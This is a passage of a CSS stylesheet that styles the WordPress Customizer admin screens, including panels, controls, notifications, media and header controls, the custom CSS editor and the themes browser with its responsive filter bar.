} #customize-info, #customize-theme-controls .customize-pane-parent { position: relative; visibility: visible; height: auto; max-height: none; overflow: auto; transform: none; } #customize-theme-controls .customize-pane-child { position: absolute; top: 0; left: 0; visibility: hidden; height: 0; max-height: none; overflow: hidden; transform: translateX(100%); } #customize-theme-controls .customize-pane-child.open, #customize-theme-controls .customize-pane-child.current-panel { transform: none; } .section-open #customize-theme-controls .customize-pane-parent, .in-sub-panel #customize-theme-controls .customize-pane-parent, .section-open #customize-info, .in-sub-panel #customize-info, .in-sub-panel.section-open #customize-theme-controls .customize-pane-child.current-panel { visibility: hidden; height: 0; overflow: hidden; transform: translateX(-100%); } .section-open #customize-theme-controls .customize-pane-parent.busy, .in-sub-panel #customize-theme-controls .customize-pane-parent.busy, .section-open #customize-info.busy, .in-sub-panel #customize-info.busy, .busy.section-open.in-sub-panel #customize-theme-controls .customize-pane-child.current-panel, #customize-theme-controls .customize-pane-child.open, #customize-theme-controls .customize-pane-child.current-panel, #customize-theme-controls .customize-pane-child.busy { visibility: visible; height: auto; overflow: auto; } #customize-theme-controls .customize-pane-child.accordion-section-content, #customize-theme-controls .customize-pane-child.accordion-sub-container { display: block; overflow-x: hidden; } #customize-theme-controls .customize-pane-child.accordion-section-content { padding: 12px; } #customize-theme-controls .customize-pane-child.menu li { position: static; } .customize-section-description-container, .control-section-nav_menu .customize-section-description-container, .control-section-new_menu .customize-section-description-container { margin-bottom: 15px; } .control-section-nav_menu .customize-control, .control-section-new_menu .customize-control { /* Override default `margin-bottom` for `.customize-control` */ margin-bottom: 0; } .customize-section-title { margin: -12px -12px 0; border-bottom: 1px solid #dcdcde; background: #fff; } div.customize-section-description { margin-top: 22px; } .customize-info div.customize-section-description { margin-top: 0; } div.customize-section-description p:first-child { margin-top: 0; } div.customize-section-description p:last-child { margin-bottom: 0; } #customize-theme-controls .customize-themes-panel h3.customize-section-title:first-child { border-bottom: 1px solid #dcdcde; padding: 12px; } .ios #customize-theme-controls .customize-themes-panel h3.customize-section-title:first-child { padding: 12px 12px 13px; } .customize-section-title h3, h3.customize-section-title { padding: 10px 10px 12px 14px; margin: 0; line-height: 21px; color: #50575e; } .accordion-sub-container.control-panel-content { display: none; position: absolute; top: 0; width: 100%; } .accordion-sub-container.control-panel-content.busy { display: block; } .current-panel .accordion-sub-container.control-panel-content { width: 100%; } .customize-controls-close { display: block; position: absolute; top: 0; left: 0; width: 45px; height: 41px; padding: 0 2px 0 0; background: #f0f0f1; border: none; border-top: 4px solid #f0f0f1; border-right: 1px solid #dcdcde; color: #3c434a; text-align: left; cursor: pointer; box-sizing: content-box; } @media (prefers-reduced-motion: no-preference) { .customize-controls-close { transition: color .15s ease-in-out, border-color .15s ease-in-out, background .15s ease-in-out; } } .customize-panel-back, .customize-section-back { display: block; float: left; width: 48px; height: 71px; padding: 0 24px 0 0; margin: 0; background: #fff; border: none; border-right: 1px solid #dcdcde; border-left: 4px solid #fff; box-shadow: none; cursor: pointer; transition: color .15s ease-in-out, border-color .15s ease-in-out, background .15s ease-in-out; } .customize-section-back { height: 74px; } .ios .customize-panel-back { display: none; } .ios .expanded.in-sub-panel .customize-panel-back { display: block; } #customize-controls .panel-meta.customize-info .accordion-section-title { margin-left: 48px; border-left: none; } #customize-controls .panel-meta.customize-info .accordion-section-title:hover, #customize-controls .cannot-expand:hover .accordion-section-title { background: #fff; color: #50575e; border-left-color: #fff; } .customize-controls-close:focus, .customize-controls-close:hover, .customize-controls-preview-toggle:focus, .customize-controls-preview-toggle:hover { background: #fff; box-shadow: none; /* Only visible in Windows High Contrast mode */ outline: 1px solid transparent; } #customize-theme-controls .accordion-section-title:focus .customize-action { /* Only visible in Windows High Contrast mode */ outline: 1px solid transparent; outline-offset: 1px; } .customize-panel-back:hover, .customize-panel-back:focus, .customize-section-back:hover, .customize-section-back:focus { background: #f6f7f7; box-shadow: none; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; outline-offset: -2px; } .customize-controls-close:before { font: normal 22px/45px dashicons; content: "\f335"; content: "\f335" / ''; position: relative; top: -3px; left: 13px; } .customize-panel-back:before, .customize-section-back:before { font: normal 20px/72px dashicons; content: "\f341"; content: "\f341" / ''; position: relative; left: 9px; } .wp-full-overlay-sidebar .wp-full-overlay-header { background-color: #f0f0f1; transition: padding ease-in-out .18s; } .in-sub-panel .wp-full-overlay-sidebar .wp-full-overlay-header { padding-left: 62px; } p.customize-section-description { font-style: normal; margin-top: 22px; margin-bottom: 0; } .customize-section-description ul { margin-left: 1em; } .customize-section-description ul > li { list-style: disc; } .section-description-buttons { text-align: right; } .customize-control { width: 100%; float: left; clear: both; margin-bottom: 12px; } .customize-control input[type="text"], .customize-control input[type="password"], .customize-control input[type="email"], .customize-control input[type="number"], .customize-control input[type="search"], .customize-control input[type="tel"], .customize-control input[type="url"], .customize-control input[type="range"] { width: 100%; margin: 0; } .customize-control-hidden { margin: 0; } .customize-control-textarea textarea { width: 100%; resize: vertical; } .customize-control select { width: 100%; } .customize-control select[multiple] { height: auto; } .customize-control-title { display: block; font-size: 14px; line-height: 1.75; font-weight: 600; margin-bottom: 4px; } .customize-control-description { display: block; font-style: italic; line-height: 1.4; margin-top: 0; margin-bottom: 5px; } .customize-section-description a.external-link:after { font: 16px/11px dashicons; content: "\f504"; content: "\f504" / ''; top: 3px; position: relative; padding-left: 3px; display: inline-block; text-decoration: none; } .customize-control-color .color-picker, .customize-control-upload div { line-height: 28px; } .customize-control .customize-inside-control-row { line-height: 1.6; display: block; margin-left: 24px; padding-top: 6px; padding-bottom: 6px; } .customize-control-radio input, .customize-control-checkbox input, .customize-control-nav_menu_auto_add input { margin-right: 4px; margin-left: -24px; } .customize-control-radio { padding: 5px 0 10px; } .customize-control-radio .customize-control-title { margin-bottom: 0; line-height: 1.6; } .customize-control-radio .customize-control-title + .customize-control-description { margin-top: 7px; } .customize-control-radio label, .customize-control-checkbox label { vertical-align: top; } .customize-control .attachment-thumb.type-icon { float: left; margin: 10px; width: auto; } .customize-control .attachment-title { font-weight: 600; margin: 0; padding: 5px 10px; } .customize-control .attachment-meta { white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin: 0; padding: 0 10px; } .customize-control .attachment-meta-title { padding-top: 7px; } /* Remove descender space. */ .customize-control .thumbnail-image, .customize-control-header .current, .customize-control .wp-media-wrapper.wp-video { line-height: 0; } .customize-control .thumbnail-image img { cursor: pointer; } #customize-controls .thumbnail-audio .thumbnail { max-width: 64px; max-height: 64px; margin: 10px; float: left; } #available-menu-items .accordion-section-content .new-content-item-wrapper, .customize-control-dropdown-pages .new-content-item-wrapper { width: calc(100% - 30px); padding: 8px 15px; position: absolute; bottom: 0; z-index: 10; background: #f0f0f1; } .customize-control-dropdown-pages .new-content-item-wrapper { width: 100%; padding: 0; position: static; } #available-menu-items .new-content-item-wrapper > label, .customize-control-dropdown-pages .new-content-item-wrapper > label { margin-bottom: 4px; display: block; } #available-menu-items .accordion-section-content .new-content-item, .customize-control-dropdown-pages .new-content-item { display: flex; } .customize-control-dropdown-pages .new-content-item { width: 100%; padding: 5px 0 5px 1px; position: relative; } .customize-control-dropdown-pages .new-content-item-wrapper .new-content-item { padding: 0; } .customize-control-dropdown-pages .new-content-item-wrapper .new-content-item label { line-height: 1.6; } #available-menu-items .new-content-item .create-item-input, .customize-control-dropdown-pages .new-content-item .create-item-input { flex-grow: 10; width: 100%; } #available-menu-items .new-content-item .create-item-input { min-height: 32px; line-height: 2.15384615; /* 28px for 32px min-height with 13px font */ } #available-menu-items .new-content-item .add-content, .customize-control-dropdown-pages .new-content-item .add-content { margin: 0 0 0 6px; flex-grow: 1; } #available-menu-items .new-content-item .add-content { min-height: 32px; line-height: 2.30769231; /* 30px for 32px min-height with 13px font */ } .customize-control-dropdown-pages .new-content-item .create-item-input.invalid { border: 1px solid #d63638; } .customize-control-dropdown-pages .add-new-toggle { margin-left: 1px; font-weight: 600; line-height: 2.2; } #customize-preview iframe { width: 100%; height: 100%; position: absolute; } #customize-preview iframe + iframe { visibility: hidden; } .wp-full-overlay-sidebar { background: #f0f0f1; border-right: 1px solid #dcdcde; } /** * Notifications */ #customize-controls .customize-control-notifications-container { /* Scoped to #customize-controls for specificity over notification styles in common.css. */ margin: 4px 0 8px; padding: 0; cursor: default; } #customize-controls .customize-control-widget_form.has-error .widget .widget-top, .customize-control-nav_menu_item.has-error .menu-item-bar .menu-item-handle { box-shadow: inset 0 0 0 2px #d63638; transition: .15s box-shadow linear; } #customize-controls .customize-control-notifications-container li.notice { list-style: none; margin: 0 0 6px; padding: 9px 14px; overflow: hidden; } #customize-controls .customize-control-notifications-container .notice.is-dismissible { padding-right: 38px; } .customize-control-notifications-container li.notice:last-child { margin-bottom: 0; } #customize-controls .customize-control-nav_menu_item .customize-control-notifications-container { margin-top: 0; } #customize-controls .customize-control-widget_form .customize-control-notifications-container { margin-top: 8px; } .customize-control-text.has-error input { outline: 2px solid #d63638; } #customize-controls #customize-notifications-area { position: absolute; top: 46px; width: 100%; border-bottom: 1px solid #dcdcde; display: block; padding: 0; margin: 0; } .wp-full-overlay.collapsed #customize-controls #customize-notifications-area { display: none !important; } #customize-controls #customize-notifications-area:not(.has-overlay-notifications), #customize-controls .customize-section-title > .customize-control-notifications-container:not(.has-overlay-notifications), #customize-controls .panel-meta > .customize-control-notifications-container:not(.has-overlay-notifications) { max-height: 210px; overflow-x: hidden; overflow-y: auto; } #customize-controls #customize-notifications-area > ul, #customize-controls #customize-notifications-area .notice, #customize-controls .panel-meta > .customize-control-notifications-container, #customize-controls .panel-meta > .customize-control-notifications-container .notice, #customize-controls .customize-section-title > .customize-control-notifications-container, #customize-controls .customize-section-title > .customize-control-notifications-container .notice { margin: 0; } #customize-controls .panel-meta > .customize-control-notifications-container, #customize-controls .customize-section-title > .customize-control-notifications-container { border-top: 1px solid #dcdcde; } #customize-controls #customize-notifications-area .notice, #customize-controls .panel-meta > .customize-control-notifications-container .notice, #customize-controls .customize-section-title > .customize-control-notifications-container .notice { padding: 9px 14px; } #customize-controls #customize-notifications-area .notice.is-dismissible, #customize-controls .panel-meta > .customize-control-notifications-container .notice.is-dismissible, #customize-controls .customize-section-title > .customize-control-notifications-container .notice.is-dismissible { padding-right: 38px; } #customize-controls #customize-notifications-area .notice + .notice, #customize-controls .panel-meta > .customize-control-notifications-container .notice + .notice, #customize-controls .customize-section-title > .customize-control-notifications-container .notice + .notice { margin-top: 1px; } @keyframes customize-fade-in { 0% { opacity: 0; } 100% { opacity: 1; } } #customize-controls .notice.notification-overlay, #customize-controls #customize-notifications-area .notice.notification-overlay { margin: 0; border-left: 0; /* @todo Appropriate styles could be added for notice-error, notice-warning, notice-success, etc */ } #customize-controls .customize-control-notifications-container.has-overlay-notifications { animation: customize-fade-in 0.5s; z-index: 30; } /* Note: Styles for this are also defined in themes.css */ #customize-controls #customize-notifications-area .notice.notification-overlay .notification-message { clear: both; color: #1d2327; font-size: 18px; font-style: normal; margin: 0; padding: 2em 0; text-align: center; width: 100%; display: block; top: 50%; position: relative; } /* Style for custom settings */ /** * Static front page */ #customize-control-show_on_front.has-error { margin-bottom: 0; } #customize-control-show_on_front.has-error .customize-control-notifications-container { margin-top: 12px; } /** * Dropdowns */ .accordion-section .dropdown { float: left; display: block; position: relative; cursor: pointer; } .accordion-section .dropdown-content { overflow: hidden; float: left; min-width: 30px; height: 16px; line-height: 16px; margin-right: 16px; padding: 4px 5px; border: 2px solid #f0f0f1; -webkit-user-select: none; user-select: none; } /* @todo maybe no more used? */ .customize-control .dropdown-arrow { position: absolute; top: 0; bottom: 0; right: 0; width: 20px; background: #f0f0f1; } .customize-control .dropdown-arrow:after { content: "\f140"; content: "\f140" / ''; font: normal 20px/1 dashicons; display: block; padding: 0; text-indent: 0; text-align: center; position: relative; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; text-decoration: none !important; color: #2c3338; } .customize-control .dropdown-status { color: #2c3338; background: #f0f0f1; display: none; max-width: 112px; } .customize-control-color .dropdown { margin-right: 5px; margin-bottom: 5px; } .customize-control-color .dropdown .dropdown-content { background-color: #50575e; border: 1px solid rgba(0, 0, 0, 0.15); } .customize-control-color .dropdown:hover .dropdown-content { border-color: rgba(0, 0, 0, 0.25); } /** * iOS can't scroll iframes, * instead it expands the iframe size to match the size of the content */ .ios .wp-full-overlay { position: relative; } .ios #customize-controls .wp-full-overlay-sidebar-content { -webkit-overflow-scrolling: touch; } /* Media controls */ .customize-control .actions .button { margin-top: 12px; } .customize-control-header .actions, .customize-control-header .uploaded { margin-bottom: 18px; } .customize-control-header .uploaded button:not(.random), .customize-control-header .default button:not(.random) { width: 100%; padding: 0; margin: 0; background: none; border: none; color: inherit; cursor: pointer; } .customize-control-header button img { display: block; } .customize-control .attachment-media-view .remove-button, .customize-control .attachment-media-view .default-button, .customize-control .attachment-media-view .upload-button, .customize-control-header button.new, .customize-control-header button.remove { width: auto; height: auto; white-space: normal; } .customize-control .attachment-media-view .upload-button { width: 100%; text-align: center; } .customize-control .attachment-media-view .upload-button.control-focus { width: auto; } .customize-control.customize-control-header .actions .upload-button.button.new { width: 100%; text-align: center; } .customize-control .attachment-media-view .thumbnail, .customize-control-header .current .container { overflow: hidden; } .customize-control .attachment-media-view .placeholder, .customize-control .attachment-media-view .button-add-media, .customize-control-header .placeholder { width: 100%; position: relative; text-align: center; cursor: default; border: 1px dashed #c3c4c7; box-sizing: border-box; padding: 9px 0; line-height: 1.6; } .customize-control .attachment-media-view .button-add-media { cursor: pointer; background-color: #f0f0f1; color: #2c3338; } .customize-control .attachment-media-view .button-add-media:hover { background-color: #fff; } .customize-control .attachment-media-view .button-add-media:focus { background-color: #fff; border-color: #3582c4; border-style: solid; box-shadow: 0 0 0 1px #3582c4; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .customize-control-header .inner { display: none; position: absolute; width: 100%; color: #50575e; white-space: nowrap; text-overflow: ellipsis; overflow: hidden; } .customize-control-header .inner, .customize-control-header .inner .dashicons { line-height: 20px; top: 8px; } .customize-control-header .list .inner, .customize-control-header .list .inner .dashicons { top: 9px; } .customize-control-header .header-view { position: relative; width: 100%; margin-bottom: 12px; } .customize-control-header .header-view:last-child { margin-bottom: 0; } /* Convoluted, but 'outline' support isn't good enough yet */ .customize-control-header .header-view:after { border: 0; } .customize-control-header .header-view.selected .choice:focus { outline: none; } .customize-control-header .header-view.selected:after { content: ""; position: absolute; height: auto; top: 0; left: 0; bottom: 0; right: 0; border: 4px solid #72aee6; border-radius: 2px; } .customize-control-header .header-view.button.selected { border: 0; } /* Header control: overlay "close" button */ .customize-control-header .uploaded .header-view .close { font-size: 20px; color: #fff; background: #50575e; background: rgba(0, 0, 0, 0.5); position: absolute; top: 10px; left: -999px; z-index: 1; width: 26px; height: 26px; cursor: pointer; } .customize-control-header .header-view:hover .close, .customize-control-header .header-view .close:focus { left: auto; right: 10px; } .customize-control-header .header-view .close:focus { outline: 1px solid #4f94d4; } /* Header control: randomiz(s)er */ .customize-control-header .random.placeholder { cursor: pointer; border-radius: 2px; height: 40px; } .customize-control-header button.random { width: 100%; height: auto; min-height: 40px; white-space: normal; } .customize-control-header button.random .dice { margin-top: 0; } .customize-control-header .placeholder:hover .dice, .customize-control-header .header-view:hover > button.random .dice { animation: dice-color-change 3s infinite; } .button-see-me { animation: bounce .7s 1; transform-origin: center bottom; } @keyframes bounce { from, 20%, 53%, 80%, to { animation-timing-function: cubic-bezier(0.215, 0.610, 0.355, 1.000); transform: translate3d(0,0,0); } 40%, 43% { animation-timing-function: cubic-bezier(0.755, 0.050, 0.855, 0.060); transform: translate3d(0, -12px, 0); } 70% { animation-timing-function: cubic-bezier(0.755, 0.050, 0.855, 0.060); transform: translate3d(0, -6px, 0); } 90% { transform: translate3d(0,-1px,0); } } .customize-control-header .choice { position: relative; display: block; margin-bottom: 9px; } .customize-control-header .choice:focus { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .customize-control-header .uploaded div:last-child > .choice { margin-bottom: 0; } .customize-control .attachment-media-view .thumbnail-image img, .customize-control-header img { max-width: 100%; } .customize-control .attachment-media-view .remove-button, .customize-control .attachment-media-view .default-button, .customize-control-header .remove { margin-right: 8px; } /* Background position control */ .customize-control-background_position .background-position-control .button-group { display: block; } /** * Code Editor Control and Custom CSS Section * * Modifications to the Section Container to make the textarea full-width and * full-height, if the control is the only control in the section. */ .customize-control-code_editor textarea { width: 100%; font-family: Consolas, Monaco, monospace; font-size: 12px; padding: 6px 8px; tab-size: 2; } .customize-control-code_editor textarea, .customize-control-code_editor .CodeMirror { height: 14em; } #customize-controls .customize-section-description-container.section-meta.customize-info { border-bottom: none; } #sub-accordion-section-custom_css .customize-control-notifications-container { margin-bottom: 15px; } #customize-control-custom_css textarea { display: block; height: 500px; } .customize-section-description-container + #customize-control-custom_css .customize-control-title { margin-left: 12px; } .customize-section-description-container + #customize-control-custom_css:last-child textarea { border-right: 0; border-left: 0; height: calc( 100vh - 185px ); resize: none; } .customize-section-description-container + #customize-control-custom_css:last-child { margin-left: -12px; width: 299px; width: calc( 100% + 24px ); margin-bottom: -12px; } .customize-section-description-container + #customize-control-custom_css:last-child .CodeMirror { height: calc( 100vh - 185px ); } .CodeMirror-lint-tooltip, .CodeMirror-hints { z-index: 500000 !important; } .customize-section-description-container + #customize-control-custom_css:last-child .customize-control-notifications-container { margin-left: 12px; margin-right: 12px; } .theme-browser .theme.active .theme-actions, .wp-customizer .theme-browser .theme .theme-actions { padding: 9px 15px; } .theme-browser .theme:not(.active) .theme-actions { box-shadow: inset 0 1px 0 rgba(0, 0, 0, 0.1); } @media screen and (max-width: 640px) { .customize-section-description-container + #customize-control-custom_css:last-child { margin-right: 0; } .customize-section-description-container + #customize-control-custom_css:last-child textarea { height: calc( 100vh - 140px ); } } /** * Themes */ #customize-theme-controls .control-panel-themes { border-bottom: none; } #customize-theme-controls .control-panel-themes > .accordion-section-title:hover, /* Not a focusable element. */ #customize-theme-controls .control-panel-themes > .accordion-section-title { cursor: default; background: #fff; color: #50575e; border-top: 1px solid #dcdcde; border-bottom: 1px solid #dcdcde; border-left: none; border-right: none; margin: 0 0 15px; padding: 12px 100px 15px 15px; /* Space for the button */ } #customize-theme-controls .control-section-themes .customize-themes-panel .accordion-section-title:first-child:hover, /* Not a focusable element. */ #customize-theme-controls .control-section-themes .customize-themes-panel .accordion-section-title:first-child { border-top: 0; } #customize-theme-controls .control-section-themes > .accordion-section-title:hover, /* Not a focusable element. */ #customize-theme-controls .control-section-themes > .accordion-section-title { margin: 0 0 15px; } #customize-controls .customize-themes-panel .accordion-section-title:hover, #customize-controls .customize-themes-panel .accordion-section-title { margin: 15px -8px; } #customize-controls .control-section-themes .accordion-section-title, #customize-controls .customize-themes-panel .accordion-section-title { padding-right: 100px; /* Space for the button */ } .control-panel-themes .accordion-section-title span.customize-action, #customize-controls .customize-section-title span.customize-action, #customize-controls .control-section-themes .accordion-section-title span.customize-action, #customize-controls .customize-section-title span.customize-action { font-size: 13px; display: block; font-weight: 400; } #customize-theme-controls .control-panel-themes .accordion-section-title .change-theme { position: absolute; right: 10px; top: 50%; margin-top: -20px; /* Half of 40px button height for vertical centering */ font-weight: 400; } #customize-notifications-area .notification-message button.switch-to-editor { display: block; margin-top: 6px; font-weight: 400; } #customize-theme-controls .control-panel-themes > .accordion-section-title:after { display: none; } .control-panel-themes .customize-themes-full-container { position: fixed; top: 0; left: 0; transition: .18s left ease-in-out; margin: 0 0 0 300px; padding: 71px 0 25px; overflow-y: scroll; width: calc(100% - 300px); height: calc(100% - 96px); background: #f0f0f1; z-index: 20; } @media (prefers-reduced-motion: reduce) { .control-panel-themes .customize-themes-full-container { transition: none; } } @media screen and (min-width: 1670px) { .control-panel-themes .customize-themes-full-container { width: 82%; right: 0; left: initial; } } .modal-open .control-panel-themes .customize-themes-full-container { overflow-y: visible; } /* Animations for opening the themes panel */ #customize-save-button-wrapper, #customize-header-actions .spinner, #customize-header-actions .customize-controls-preview-toggle { transition: .18s margin ease-in-out; } #customize-footer-actions, #customize-footer-actions .collapse-sidebar { bottom: 0; transition: .18s bottom ease-in-out; } .in-themes-panel:not(.animating) #customize-header-actions .spinner, .in-themes-panel:not(.animating) #customize-header-actions .customize-controls-preview-toggle, .in-themes-panel:not(.animating) #customize-preview, .in-themes-panel:not(.animating) #customize-footer-actions { visibility: hidden; } .wp-full-overlay.in-themes-panel { background: #f0f0f1; /* Prevents a black flash when fading in the panel */ } .in-themes-panel #customize-save-button-wrapper, .in-themes-panel #customize-header-actions .spinner, .in-themes-panel #customize-header-actions .customize-controls-preview-toggle { margin-top: -46px; /* Height of header actions bar */ } .in-themes-panel #customize-footer-actions, .in-themes-panel #customize-footer-actions .collapse-sidebar { bottom: -45px; } /* Don't show the theme count while the panel opens, as it's in the wrong place during the animation */ .in-themes-panel.animating .control-panel-themes .filter-themes-count { display: none; } .in-themes-panel.wp-full-overlay .wp-full-overlay-sidebar-content { bottom: 0; } .themes-filter-bar .feature-filter-toggle { min-height: 32px; line-height: 2.30769231; } .themes-filter-bar .feature-filter-toggle:before { content: "\f111"; content: "\f111" / ''; margin: 0 5px 0 0; font: normal 16px/1 dashicons; vertical-align: text-bottom; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .themes-filter-bar .feature-filter-toggle.open { background: #f0f0f1; border-color: #8c8f94; box-shadow: inset 0 2px 5px -3px rgba(0, 0, 0, 0.5); } .themes-filter-bar .feature-filter-toggle .filter-count-filters { display: none; } .filter-drawer { box-sizing: border-box; width: 100%; position: absolute; top: 46px; left: 0; padding: 25px 0 25px 25px; border-top: 0; margin: 0; background: #f0f0f1; border-bottom: 1px solid #dcdcde; } .filter-drawer .filter-group { margin: 0 25px 0 0; width: calc( (100% - 75px) / 3); min-width: 200px; max-width: 320px; } /* Adds a delay before fading in to avoid it "jumping" */ @keyframes themes-fade-in { 0% { opacity: 0; } 50% { opacity: 0; } 100% { opacity: 1; } } .control-panel-themes .customize-themes-full-container.animate { animation: .6s themes-fade-in 1; } .in-themes-panel:not(.animating) .control-panel-themes .filter-themes-count { animation: .6s themes-fade-in 1; } .control-panel-themes .filter-themes-count .themes-displayed { font-weight: 600; color: #50575e; } .customize-themes-notifications { margin: 0; } .control-panel-themes .customize-themes-notifications .notice { margin: 0 0 25px; } .customize-themes-full-container .customize-themes-section { display: none !important; /* There is unknown JS that perpetually tries to show all theme sections when more items are added. */ overflow: hidden; } .customize-themes-full-container .customize-themes-section.current-section { display: list-item !important; /* There is unknown JS that perpetually tries to show all theme sections when more items are added. */ } .control-section .customize-section-text-before { padding: 0 0 8px 15px; margin: 15px 0 0; line-height: 16px; border-bottom: 1px solid #dcdcde; color: #50575e; } .control-panel-themes .customize-themes-section-title { width: 100%; background: #fff; box-shadow: none; outline: none; border-top: none; border-bottom: 1px solid #dcdcde; border-left: 4px solid #fff; border-right: none; cursor: pointer; padding: 10px 15px; position: relative; text-align: left; font-size: 14px; font-weight: 600; color: #50575e; text-shadow: none; } .control-panel-themes #accordion-section-installed_themes { border-top: 1px solid #dcdcde; } .control-panel-themes .theme-section { margin: 0; position: relative; } .control-panel-themes .customize-themes-section-title:focus, .control-panel-themes .customize-themes-section-title:hover { background: #f6f7f7; } .customize-themes-section-title:not(.selected):after { content: ""; display: block; position: absolute; top: 9px; right: 15px; width: 18px; height: 18px; border-radius: 100%; border: 1px solid #c3c4c7; background: #fff; } .control-panel-themes .theme-section .customize-themes-section-title.selected:after { content: "\f147"; content: "\f147" / ''; font: 16px/1 dashicons; box-sizing: border-box; width: 20px; height: 20px; padding: 3px 3px 1px 1px; /* Re-align the icon to the smaller grid */ border-radius: 100%; position: absolute; top: 9px; right: 15px; color: #fff; } #customize-theme-controls .themes.accordion-section-content { position: relative; left: 0; padding: 0; width: 100%; } .loading .customize-themes-section .spinner { display: block; visibility: visible; position: relative; clear: both; width: 20px; height: 20px; left: calc(50% - 10px); float: none; margin-top: 50px; } .customize-themes-section .no-themes, .customize-themes-section .no-themes-local { display: none; } .themes-section-installed_themes .theme .notice-success:not(.updated-message) { display: none; /* Hide "installed" notice on installed themes tab. */ } .customize-control-theme .theme { width: 100%; margin: 0; border: 1px solid #dcdcde; background: #fff; } .customize-control-theme .theme .theme-name, .customize-control-theme .theme .theme-actions { background: #fff; border: none; } .customize-control.customize-control-theme { /* override most properties on .customize-control */ box-sizing: border-box; width: 25%; max-width: 600px; /* Max. screenshot size / 2 */ margin: 0 25px 25px 0; padding: 0; clear: none; } /* 5 columns above 2100px */ @media screen and (min-width: 2101px) { .customize-control.customize-control-theme { width: calc( ( 100% - 125px ) / 5 - 1px ); /* 1px offset accounts for browser rounding, typical all grids */ } } /* 4 columns up to 2100px */ @media screen and (min-width: 1601px) and (max-width: 2100px) { .customize-control.customize-control-theme { width: calc( ( 100% - 100px ) / 4 - 1px ); } } /* 3 columns up to 1600px */ @media screen and (min-width: 1201px) and (max-width: 1600px) { .customize-control.customize-control-theme { width: calc( ( 100% - 75px ) / 3 - 1px ); } } /* 2 columns up to 1200px */ @media screen and (min-width: 851px) and (max-width: 1200px) { .customize-control.customize-control-theme { width: calc( ( 100% - 50px ) / 2 - 1px ); } } /* 1 column up to 850 px */ @media screen and (max-width: 850px) { .customize-control.customize-control-theme { width: 100%; } } .wp-customizer .theme-browser .themes { padding: 0 0 25px 25px; transition: .18s margin-top linear; } .wp-customizer .theme-browser .theme .theme-actions { opacity: 1; } #customize-controls h3.theme-name { font-size: 15px; } #customize-controls .theme-overlay .theme-name { font-size: 32px; } .customize-preview-header.themes-filter-bar { position: fixed; top: 0; left: 300px; width: calc(100% - 300px); height: 46px; background: #f0f0f1; z-index: 10; padding: 6px 25px; box-sizing: border-box; border-bottom: 1px solid #dcdcde; } .customize-preview-header.themes-filter-bar, .customize-preview-header.themes-filter-bar .search-form { display: flex; align-items: center; gap: 10px; flex-wrap: wrap; } .customize-preview-header.themes-filter-bar .search-form-input { position: relative; } .customize-preview-header .filter-themes-wrapper { display: grid; align-items: center; gap: 10px; grid-template-columns: auto 1fr; } .customize-preview-header .filter-themes-wrapper .filter-themes-count { justify-self: end; } @media screen and (min-width: 1670px) { .customize-preview-header.themes-filter-bar { width: 82%; right: 0; left: initial; } } .themes-filter-bar .themes-filter-container { margin: 0; padding: 0; display: flex; align-items: center; gap: 10px; } .themes-filter-bar .wp-filter-search { padding: 0 10px 0 30px; max-width: 100%; width: 40%; min-width: 300px; height: 32px; min-height: 32px; /* Override global 40px min-height for compact bar */ margin: 1px 0; top: 0; left: 0; } /* Unstick the filter bar on short windows/screens. This breakpoint is based on the current length of .org feature filters assuming translations do not wrap lines. */ @media screen and (max-height: 540px), screen and (max-width: 1018px) { .customize-preview-header.themes-filter-bar { position: relative; left: 0; width: 100%; margin: 0 0 25px; } .filter-drawer { top: 46px; } .wp-customizer .theme-browser .themes { padding: 0 0 25px 25px; overflow: hidden; } .control-panel-themes .customize-themes-full-container { margin-top: 0; padding: 0; height: 100%; width: calc(100% - 300px); } } @media screen and (max-width: 1018px) { .filter-drawer .filter-group { width: calc( (100% - 50px) / 2); } } @media screen and (max-width: 960px) { .customize-preview-header.themes-filter-bar { height: 96px; } } @media screen and (max-width: 900px) { .themes-filter-bar .wp-filter-search { width: 100%; margin: 0; min-width: 200px; } .customize-preview-header.themes-filter-bar, .customize-preview-header.themes-filter-bar .search-form .themes-filter-bar .themes-filter-container { display: grid; gap: 4px; } .customize-preview-header.themes-filter-bar .search-form-input { display: flex; flex-grow: 1; } .filter-drawer { top: 86px; } .control-panel-themes .filter-themes-count { float: left; } } @media screen and (max-width: 792px) { .filter-drawer .filter-group { width: calc( 100% - 25px); } } .control-panel-themes .customize-themes-mobile-back { display: none; } /* Mobile - toggle between themes and filters */ @media screen and (max-width: 600px) { .filter-drawer { top: 132px; } .wp-full-overlay.showing-themes .control-panel-themes .filter-themes-count .filter-themes { display: block; float: right; } .control-panel-themes .customize-themes-full-container { width: 100%; margin: 0; padding-top: 46px; height: calc(100% - 46px); z-index: 1; display: none; } .showing-themes .control-panel-themes .customize-themes-full-container { display: block; } .wp-customizer .showing-themes .control-panel-themes .customize-themes-mobile-back { display: block; position: fixed; top: 0; left: 0; background: #f0f0f1; color: #3c434a; border-radius: 0; box-shadow: none; border: none; height: 46px; width: 100%; z-index: 10; text-align: left; text-shadow: none; border-bottom: 1px solid #dcdcde; border-left: 4px solid transparent; margin: 0; padding: 0; font-size: 0; overflow: hidden; } .wp-customizer .showing-themes .control-panel-themes .customize-themes-mobile-back:before { left: 0; top: 0; height: 46px; width: 26px; display: block; line-height: 2.3; padding: 0 8px; border-right: 1px solid #dcdcde; } .wp-customizer .showing-themes .control-panel-themes .customize-themes-mobile-back:hover, .wp-customizer .showing-themes .control-panel-themes .customize-themes-mobile-back:focus { background: #f6f7f7; box-shadow: none; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; outline-offset: -2px; } .showing-themes #customize-header-actions { display: none; } #customize-controls { width: 100%; } } /* Details View */ .wp-customizer .theme-overlay { display: none; } .wp-customizer.modal-open .theme-overlay { position: fixed; left: 0; top: 0; right: 0; bottom: 0; z-index: 109; } /* Avoid a z-index war by resetting elements that should be under the overlay. This is likely required because of the way that sections and panels are positioned. */ .wp-customizer.modal-open #customize-header-actions, .wp-customizer.modal-open .control-panel-themes .filter-themes-count, .wp-customizer.modal-open .control-panel-themes .customize-themes-section-title.selected:after { z-index: -1; } .wp-full-overlay.in-themes-panel.themes-panel-expanded #customize-controls .wp-full-overlay-sidebar-content { overflow: visible; } .wp-customizer .theme-overlay .theme-backdrop { 